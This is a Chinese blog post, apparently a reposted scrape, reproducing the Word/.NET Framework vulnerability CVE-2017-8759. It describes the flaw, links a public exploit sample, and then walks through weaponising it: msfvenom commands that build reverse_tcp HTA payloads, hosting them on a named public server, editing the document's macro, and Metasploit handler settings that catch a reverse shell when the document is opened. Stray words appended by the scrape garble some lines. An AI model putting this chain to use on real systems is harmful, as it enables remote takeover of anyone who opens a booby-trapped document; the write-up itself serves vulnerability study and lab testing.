CVE-2017-8759 微軟word漏洞復現以及利用

CVE-2017-8759 微軟word漏洞復現以及利用

0x00 漏洞描述

近日,360集團核心安全事業部分析團隊發現一個新型的Office文檔高級威脅攻擊,攻擊使用了9月12日補丁剛修復的.NET Framework漏洞,該漏洞在野外被利用時爲0day狀態,用戶打開惡意的Office文檔就會中招。該漏洞的技術原理和今年黑客「奧斯卡」Pwnie Awards上的最佳客戶端漏洞(CVE-2017-0199)一模一樣,不一樣的是,此次黑客在Offcie文檔中嵌入新的Moniker對象,利用的是.net庫漏洞,在Office文檔中加載執行遠程的惡意.NET代碼,而整個漏洞的罪魁禍首競是.NET Framework一個換行符處理失誤。html

影響範圍:python

Microsoft .NET Framework 4.6.2
Microsoft .NET Framework 4.6.1
Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4.7
Microsoft .NET Framework 4.6
Microsoft .NET Framework 4.5.2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 2.0 SP2git

0x01 驗證漏洞

exploit-sample地址:https://github.com/Voulnet/CVE-2017-8759-Exploit-samplegithub

將文件下載下來,打開所在的文件夾,在當前文件夾建立一個命令行,運行:
python -m SimpleHTTPServer 8080shell

這個時候咱們已經在本地的8080端口建立了一個服務器了windows

而後打開doc文件,啓用編輯,就會彈出畫圖工具,漏洞驗證成功安全

0x02 漏洞利用

環境說明:服務器

  • ip: 120.27.32.227 這是我在公網的主機
  • ip: 192.168.242.137 虛擬機的kali
  • 靶機: windows7 個人實體機,虛擬機沒有裝了office的

1. 分析流程

word的宏tcp

exploit.txt 文件工具

cmd.hta文件

因此流程是:

word宏 ==》 exploit.txt ==》 cmd.hta

2. 修改利用

  1. 我將exploit.txt修改爲以下而後上傳到我本身的服務器120.27.32.227

訪問文件

fn.hta是我用msfvenom生成的,具體命令以下

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.242.137 LPORT=7777 -f hta-psh -o /var/fn.hta

或者

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.242.137 LPORT=7777 -f hta-psh -o /var/fn.hta
  1. 修改宏

  1. 而後上傳fn.hta到服務器120.27.32.227

3.驗證

虛擬機kali(192.168.242.137)啓動metasploit

use exploit/multi/handler 

set PAYLOAD windows/x64/shell/reverse_tcp

set LHOST 192.168.242.137

set LPORT 7777

exploit

修改過宏的文檔在win7打開,反彈回來一個shell

打開word文檔的這個過程,360會進行提示但不是報毒,最後還會留下這麼一個窗口

至此,漏洞驗證到利用結束

0x03 漏洞利用思路

這二者利用參考文章freebuf有:http://www.freebuf.com/sectool/90362.html

最後,參考文檔:

相關文章
相關標籤/搜索